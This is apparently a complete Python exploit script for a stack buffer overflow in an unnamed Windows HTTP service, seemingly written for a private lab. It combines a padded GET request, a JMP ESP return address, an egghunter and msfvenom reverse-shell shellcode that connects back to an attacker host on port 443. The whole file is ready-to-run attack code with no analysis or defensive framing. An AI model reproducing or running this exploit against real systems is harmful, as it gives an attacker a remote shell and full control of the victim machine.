#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/06 09:48:45 dhn Exp $

import socket

# msfvenom --platform windows -p windows/shell_reverse_tcp \
#   LHOST=172.16.133.1 LPORT=443 -b "\x00\x0a\x0d" \
#   -e x86/alpha_mixed -f py
shellcode =  (
	"\x89\xe6\xd9\xe1\xd9\x76\xf4\x59\x49\x49\x49\x49\x49"
	"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
	"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
	"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
	"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x39\x78\x4e\x62"
	"\x63\x30\x33\x30\x77\x70\x45\x30\x6d\x59\x59\x75\x66"
	"\x51\x59\x50\x45\x34\x6c\x4b\x72\x70\x44\x70\x6e\x6b"
	"\x73\x62\x36\x6c\x6c\x4b\x63\x62\x46\x74\x6c\x4b\x70"
	"\x72\x35\x78\x54\x4f\x4d\x67\x61\x5a\x36\x46\x36\x51"
	"\x59\x6f\x4e\x4c\x57\x4c\x33\x51\x61\x6c\x46\x62\x56"
	"\x4c\x65\x70\x4a\x61\x4a\x6f\x46\x6d\x33\x31\x59\x57"
	"\x6a\x42\x79\x62\x36\x32\x73\x67\x4c\x4b\x76\x32\x46"
	"\x70\x6e\x6b\x43\x7a\x67\x4c\x4e\x6b\x72\x6c\x37\x61"
	"\x50\x78\x78\x63\x77\x38\x55\x51\x4e\x31\x50\x51\x4e"
	"\x6b\x53\x69\x47\x50\x37\x71\x7a\x73\x6c\x4b\x62\x69"
	"\x46\x78\x48\x63\x45\x6a\x62\x69\x4c\x4b\x67\x44\x4e"
	"\x6b\x73\x31\x4b\x66\x44\x71\x59\x6f\x6e\x4c\x79\x51"
	"\x48\x4f\x76\x6d\x76\x61\x4a\x67\x57\x48\x4b\x50\x42"
	"\x55\x6c\x36\x65\x53\x33\x4d\x5a\x58\x47\x4b\x33\x4d"
	"\x64\x64\x53\x45\x4b\x54\x72\x78\x4e\x6b\x72\x78\x55"
	"\x74\x77\x71\x68\x53\x55\x36\x6c\x4b\x76\x6c\x42\x6b"
	"\x4c\x4b\x61\x48\x65\x4c\x67\x71\x49\x43\x4e\x6b\x76"
	"\x64\x4e\x6b\x35\x51\x4e\x30\x6c\x49\x42\x64\x61\x34"
	"\x31\x34\x33\x6b\x63\x6b\x31\x71\x70\x59\x51\x4a\x76"
	"\x31\x39\x6f\x6d\x30\x61\x4f\x31\x4f\x30\x5a\x4c\x4b"
	"\x54\x52\x6a\x4b\x4c\x4d\x43\x6d\x72\x48\x74\x73\x66"
	"\x52\x43\x30\x47\x70\x61\x78\x62\x57\x51\x63\x44\x72"
	"\x71\x4f\x66\x34\x52\x48\x32\x6c\x74\x37\x47\x56\x74"
	"\x47\x39\x6f\x59\x45\x48\x38\x4e\x70\x77\x71\x63\x30"
	"\x57\x70\x51\x39\x7a\x64\x43\x64\x76\x30\x52\x48\x44"
	"\x70\x6f\x70\x50\x6b\x55\x50\x6b\x4f\x4b\x65\x66\x30"
	"\x56\x70\x50\x50\x30\x50\x51\x50\x52\x70\x47\x30\x76"
	"\x30\x63\x58\x58\x6a\x76\x6f\x79\x4f\x49\x70\x6b\x4f"
	"\x78\x55\x6c\x57\x51\x7a\x56\x65\x53\x58\x6e\x4c\x32"
	"\x30\x4f\x75\x45\x51\x50\x68\x75\x52\x75\x50\x36\x61"
	"\x6d\x6b\x6b\x39\x78\x66\x51\x7a\x52\x30\x62\x76\x71"
	"\x47\x52\x48\x4f\x69\x4e\x45\x44\x34\x65\x31\x4b\x4f"
	"\x69\x45\x6d\x55\x4f\x30\x71\x64\x66\x6c\x59\x6f\x70"
	"\x4e\x44\x48\x70\x75\x6a\x4c\x62\x48\x78\x70\x4e\x55"
	"\x49\x32\x76\x36\x69\x6f\x68\x55\x31\x78\x73\x53\x32"
	"\x4d\x31\x74\x67\x70\x4b\x39\x4d\x33\x61\x47\x32\x77"
	"\x31\x47\x55\x61\x4a\x56\x30\x6a\x57\x62\x42\x79\x71"
	"\x46\x4d\x32\x49\x6d\x55\x36\x69\x57\x50\x44\x55\x74"
	"\x77\x4c\x67\x71\x56\x61\x6c\x4d\x63\x74\x46\x44\x64"
	"\x50\x69\x56\x77\x70\x61\x54\x63\x64\x30\x50\x76\x36"
	"\x66\x36\x50\x56\x67\x36\x32\x76\x50\x4e\x66\x36\x31"
	"\x46\x50\x53\x66\x36\x42\x48\x70\x79\x58\x4c\x55\x6f"
	"\x4e\x66\x69\x6f\x7a\x75\x4c\x49\x59\x70\x52\x6e\x71"
	"\x46\x77\x36\x49\x6f\x70\x30\x62\x48\x74\x48\x6b\x37"
	"\x75\x4d\x75\x30\x6b\x4f\x6e\x35\x6d\x6b\x7a\x50\x6e"
	"\x55\x59\x32\x56\x36\x33\x58\x49\x36\x4c\x55\x4d\x6d"
	"\x6f\x6d\x79\x6f\x39\x45\x75\x6c\x53\x36\x73\x4c\x67"
	"\x7a\x6f\x70\x79\x6b\x59\x70\x30\x75\x33\x35\x4f\x4b"
	"\x42\x67\x57\x63\x64\x32\x50\x6f\x42\x4a\x47\x70\x62"
	"\x73\x59\x6f\x4a\x75\x41\x41"
)

# egg: EVIL
egg_signature = "LIVELIVE"

# egghunter: 32 bytes
egghunter = (
	"\x66\x81\xca\xff\x0f"          # or    dx, 0xfff
	"\x42"                          # inc   edx
	"\x52"                          # push  edx
	"\x6a\x02"                      # push  2
	"\x58"                          # pop   eax
	"\xcd\x2e"                      # int   0x2e
	"\x3c\x05"                      # cmp   al, 5
	"\x5a"                          # pop   edx
	"\x74\xef"                      # je    0x1000
	"\xb8\x4c\x49\x56\x45"          # mov   eax, 0x4556494c
	"\x8b\xfa"                      # mov   edi, edx
	"\xaf"                          # scasd eax, dword ptr es:[edi]
	"\x75\xea"                      # jne   0x1005
	"\xaf"                          # scasd eax, dword ptr es:[edi]
	"\x75\xe7"                      # jne   0x1005
	"\xff\xe7"                      # jmp   edi
)

if __name__ == "__main__":
	padding = "A" * 186
	jmp_esp = "\x7C\x86\x46\x7B"[::-1] # kernel32.dll

	payload = padding
	payload += jmp_esp
	payload += "\x90" * 8 + egghunter
	payload += "\xcc" * (258 - 186 - 4 - 8 - len(egghunter))

	buf = "GET /" + payload + " HTTP/1.1\r\n"
	buf += "Host: 172.16.133.131\r\n"
	buf += "User-Agent: Mozilla/5.0\r\n"
	buf += egg_signature + shellcode + "\r\n"
	buf += "\r\n"

	print("[+] Sending the payload!")
	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
	expl.connect(("172.16.133.129", 3000))
	expl.send(buf)
	expl.close()
